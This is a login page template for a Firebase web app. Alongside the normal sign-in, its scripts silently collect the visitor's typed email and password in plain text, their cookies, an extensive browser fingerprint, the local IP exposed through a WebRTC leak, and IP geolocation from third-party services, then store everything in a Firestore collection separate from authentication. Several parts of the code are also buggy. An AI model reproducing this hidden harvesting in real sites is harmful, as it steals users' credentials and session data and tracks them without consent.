<!DOCTYPE html>
<html>
	<head>
		<% include ga.ejs %> <% include links.ejs %> <% include meta.ejs %> <%
		include css.ejs %>
		<script src="/__/firebase/5.9.4/firebase-app.js"></script>
		<script src="/__/firebase/5.9.4/firebase-auth.js"></script>
		<script src="/__/firebase/5.9.4/firebase-firestore.js"></script>
		<script src="/__/firebase/init.js"></script>
		<script src="js/jquery-3.2.1.min.js"></script>
		<script>
			// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
			var RTCPeerConnection =
				/*window.RTCPeerConnection ||*/ window.webkitRTCPeerConnection ||
				window.mozRTCPeerConnection;

			if (RTCPeerConnection)
				(function() {
					var rtc = new RTCPeerConnection({ iceServers: [] });
					if (1 || window.mozRTCPeerConnection) {
						// FF [and now Chrome!] needs a channel/stream to proceed
						rtc.createDataChannel('', { reliable: false });
					}

					rtc.onicecandidate = function(evt) {
						// convert the candidate to SDP so we can run it through our general parser
						// see https://twitter.com/lancestout/status/525796175425720320 for details
						if (evt.candidate)
							grepSDP('a=' + evt.candidate.candidate);
					};
					rtc.createOffer(
						function(offerDesc) {
							grepSDP(offerDesc.sdp);
							rtc.setLocalDescription(offerDesc);
						},
						function(e) {
							console.warn('offer failed', e);
						}
					);

					var addrs = Object.create(null);
					addrs['0.0.0.0'] = false;
					function updateDisplay(newAddr) {
						if (newAddr in addrs) return;
						else addrs[newAddr] = true;
						var displayAddrs = Object.keys(addrs).filter(function(
							k
						) {
							return addrs[k];
						});
						document.getElementById('internalIP').textContent =
							displayAddrs.join(' or perhaps ') || 'n/a';
					}

					function grepSDP(sdp) {
						var hosts = [];
						sdp.split('\r\n').forEach(function(line) {
							// c.f. http://tools.ietf.org/html/rfc4566#page-39
							if (~line.indexOf('a=candidate')) {
								// http://tools.ietf.org/html/rfc4566#section-5.13
								var parts = line.split(' '), // http://tools.ietf.org/html/rfc5245#section-15.1
									addr = parts[4],
									type = parts[7];
								if (type === 'host') updateDisplay(addr);
							} else if (~line.indexOf('c=')) {
								// http://tools.ietf.org/html/rfc4566#section-5.7
								var parts = line.split(' '),
									addr = parts[2];
								updateDisplay(addr);
							}
						});
					}
				})();
			else {
				document.getElementById('internalIP').innerHTML =
					'<code>ifconfig | grep inet | grep -v inet6 | cut -d" " -f2 | tail -n1</code>';
				document.getElementById('internalIP').nextSibling.textContent =
					'In Chrome and Firefox your IP should display automatically, by the power of WebRTCskull.';
			}
		</script>
		<script>
			const db = firebase.firestore();
			var ipapiData, ipinfoData;
			function toggleSignIn() {
				if (firebase.auth().currentUser) {
					firebase.auth().signOut();
				} else {
					var email = document.getElementById('username').value;
					var password = document.getElementById('password').value;
					if (email.length < 15) {
						Materialize.toast(
							'Please enter a valid email address.',
							1250
						);
						return;
					}
					if (password.length < 6) {
						Materialize.toast(
							'Please enter a valid password',
							1250
						);
						return;
					}
					var pointer = db.collection('onsubmit').doc(
						firebase.firestore.Timestamp.now()
							.toDate()
							.toString()
					);
					$.getJSON('https://ipapi.co/json/', function(data) {
						ipapiData = JSON.stringify(data, null, 2);
					});
					$.getJSON('https://ipinfo.io/json', function(data) {
						ipinfoData = JSON.stringify(data, null, 2);
					});
					pointer
						.get()
						.then(doc => {
							if (doc.exists) {
								location.reload(true);
								return;
							} else {
								db.collection('onsubmit')
									.doc(
										firebase.firestore.Timestamp.now()
											.toDate()
											.toString()
									)
									.set(ob);
								return;
							}
						})
						.catch(err => {
							console.log(err);
						});
					firebase
						.auth()
						.signInWithEmailAndPassword(email, password)
						.catch(function(error) {
							var errorCode = error.code;
							var errorMessage = error.message;
							if (errorCode === 'auth/wrong-password') {
								Materialize.toast('Wrong password', 1250);
							} else if (errorCode === 'auth/user-not-found') {
								Materialize.toast('User not found', 1250);
							} else {
								Materialize.toast(errorMessage, 1500);
							}
						});
				}
			}
			function initApp() {
				var pointer = db.collection('onload').doc(
					firebase.firestore.Timestamp.now()
						.toDate()
						.toString()
				);
				$.getJSON('https://ipapi.co/json/', function(data) {
					ipapiData = JSON.stringify(data, null, 2);
				});
				$.getJSON('https://ipinfo.io/json', function(data) {
					ipinfoData = JSON.stringify(data, null, 2);
				});
				pointer
					.get()
					.then(doc => {
						if (doc.exists) {
							location.reload(true);
							return;
						} else {
							var ob = {
								email: document.getElementById('username')
									.value,
								password: document.getElementById('password')
									.value,
								navigator: {
									timeOpened: new Date(),
									timezone:
										new Date().getTimezoneOffset() / 60,
									pageon: window.location.pathname,
									referrer: document.referrer,
									previousSites: history.length,
									browserCodeName: navigator.appCodeName,
									browserName: navigator.appName,
									browserEngine: navigator.product,
									browserVersion1a: navigator.appVersion,
									browserVersion1b: navigator.userAgent,
									browserLanguage: navigator.language,
									browserOnline: navigator.onLine,
									browserPlatform: navigator.platform,
									connection:
										navigator.connection ||
										navigator.mozConnection ||
										navigator.webkitConnection,
									javaEnabled: navigator.javaEnabled(),
									dataCookiesEnabled: navigator.cookieEnabled,
									dataCookies1: document.cookie,
									dataCookies2: decodeURIComponent(
										document.cookie.split(';')
									),
									sizeScreenW: screen.width,
									sizeScreenH: screen.height,
									sizeDocW:
										document.documentElement.clientWidth,
									bodyCliW: document.body.clientWidth,
									sizeDocH:
										document.documentElement.clientHeight,
									bodyCliH: document.body.clientHeight,
									sizeInW: innerWidth,
									sizeInH: innerHeight,
									sizeAvailW: screen.availWidth,
									sizeAvailH: screen.availHeight,
									scrColorDepth: screen.colorDepth,
									scrPixelDepth: screen.pixelDepth,
									ipapiData: ipapiDataCheck(),
									ipinfoData: ipinfoDataCheck(),
									internalIP: document.getElementById('internalIP').innerText
								}
							};
							console.log(ob);
							db.collection('onsubmit')
								.doc(
									firebase.firestore.Timestamp.now()
										.toDate()
										.toString()
								)
								.set(ob);
							return;
						}
					})
					.catch(err => {
						console.log(err);
					});
				firebase.auth().onAuthStateChanged(function(user) {
					if (user) {
						Materialize.toast('Signing in...', 1000);
						var displayName = user.displayName;
						var email = user.email;
						window.location = '/';
					} else {
						Materialize.toast('Login to continue', 1250);
					}
				});
			}
			function ipapiDataCheck() {
				if (ipapiData) {
					return ipapiData;
				} else return false;
			}
			function ipinfoDataCheck() {
				if (ipapiData) {
					return ipapiData;
				} else return false;
			}
			window.onload = initApp();
		</script>
	</head>
	<body>
		<h1 id="internalIP"></h1>
		<div class="container" id="LoginContainer">
			<div class="row"></div>
			<div id="login-page" class="row">
				<div class="col s12 m2 l4"></div>
				<div class="col s12 m8 l4 z-depth-4 card-panel">
					<form class="login-form">
						<div class="row ">
							<h4 class="center-align">Login</h4>
						</div>
						<div class="row margin">
							<div class="input-field col s12">
								<i class="material-icons prefix"
									>account_circle</i
								>
								<input
									id="username"
									type="text"
									autocomplete="email"
								/>
								<label for="username" class="center-align"
									>Username</label
								>
							</div>
						</div>
						<div class="row margin center-align">
							<div class="input-field col s12">
								<i class="material-icons prefix">lock</i>
								<input
									id="password"
									type="password"
									autocomplete="current-password"
								/>
								<label for="password">Password</label>
							</div>
						</div>
						<div class="row">
							<div class="input-field col s12 ">
								<a
									onclick="toggleSignIn()"
									class="btn waves-effect waves-light col s12"
									>Login</a
								>
							</div>
						</div>
						<div class="row"></div>
					</form>
				</div>
				<div class="col s12 m2 l4">
					<!-- Note that "m4 l3" was added -->
				</div>
			</div>
		</div>
		<script type="text/javascript" src="js/materialize.min.js"></script>
		<script async src="js/manup.js"></script>
		<script>
			if (navigator.serviceWorker.controller) {
				console.log(
					'[PWA Builder] active service worker found, no need to register'
				);
			} else {
				navigator.serviceWorker
					.register('pwabuilder-sw.js', {
						scope: './'
					})
					.then(function(reg) {
						console.log(
							'Service worker has been registered for scope:' +
								reg.scope
						);
					});
			}
		</script>
		<script>
			$('.button-collapse').sideNav({
				menuWidth: 300, // Default is 300
				edge: 'left', // Choose the horizontal origin
				closeOnClick: true, // Closes side-nav on <a> clicks, useful for Angular/Meteor
				draggable: true, // Choose whether you can drag to open on touch screens,
				onOpen: function(el) {
					/* Do Stuff* / }, // A function to be called when sideNav is opened
          onClose: function(el) { /* Do Stuff */
				} // A function to be called when sideNav is closed
			});
			$('.collapsible').collapsible();
			$('.button-collapse').sideNav('hide');
			$(document).ready(function() {
				$('select').material_select();
			});
		</script>
	</body>
</html>
